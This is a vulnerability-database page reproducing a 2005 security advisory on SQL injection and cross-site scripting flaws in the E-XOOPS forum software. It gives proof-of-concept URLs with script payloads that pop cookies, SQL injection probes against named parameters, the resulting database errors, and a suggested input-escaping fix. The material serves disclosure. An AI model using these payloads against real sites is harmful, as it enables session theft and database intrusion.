Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

dcrab-e-xoops.txt

🗓️ 28 Mar 2005 00:00:00Reported by Diabolic CrabType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 26 Views

Multiple SQL injection, and XSS vulnerabilities in Easy Community Management System Forum (E-XOOPS) - High severit

Code
`Dcrab 's Security Advisory  
http://icis.digitalparadox.org/~dcrab  
http://www.hackerscenter.com/  
  
Severity: High  
Title: Multiple Sql injection, and multiple XSS vulnerabilities in Easy Community Management System Forum (E-XOOPS)  
Date: March 28, 2005  
  
Summary:  
There are multiple sql injection, xss vulnerabilities in the Easy Community Management System Forum (E-XOOPS)  
Vendor: E-Xoops  
Vendor website: www.exoops.info  
  
Proof of Concept Exploits:  
  
http://localhost/modules/newbb/viewforum.php?sortname=p.post_time&sortorder=ASC&sortdays=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&forum=25&refresh=Vai  
Pops cookie  
  
  
http://localhost/modules/newbb/index.php?viewcat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
Pops cookie  
  
  
http://localhost/modules/newbb/index.php?viewcat='SQL_INJECTION  
SQL ERROR AND POSSIBLE INJECTION  
Error  
  
SELECT f.*, u.uname, u.uid, p.topic_id, p.post_time, p.subject, p.icon FROM e_xoops_bb_forums f LEFT JOIN e_xoops_bb_posts p ON p.post_id = f.forum_last_post_id LEFT JOIN e_xoops_users u ON u.uid = p.uid WHERE f.cat_id = \'SQL_INJECTION ORDER BY f.cat_id, f.forum_name  
  
  
http://localhost/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9  
SQL ERROR AND POSSIBLE INJECTION  
  
Errore Numero: 2 [Attenzione]  
Message errore: mysql_fetch_row(): supplied argument is not a valid MySQL result resource  
In File: /var/www/*************/09/class/database/mysql.php  
On Line: 151  
  
Errore Numero: 2 [Attenzione]  
Message errore: mysql_fetch_row(): supplied argument is not a valid MySQL result resource  
In File: /var/www/*************/09/class/database/mysql.php  
On Line: 151   
  
  
Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.  
  
Author:  
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come out book on Secure coding with php.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4
e-xoopssql injectionxssvulnerabilitiessecurity advisoryeasy community management systemdiabolic crabhackerscenter
26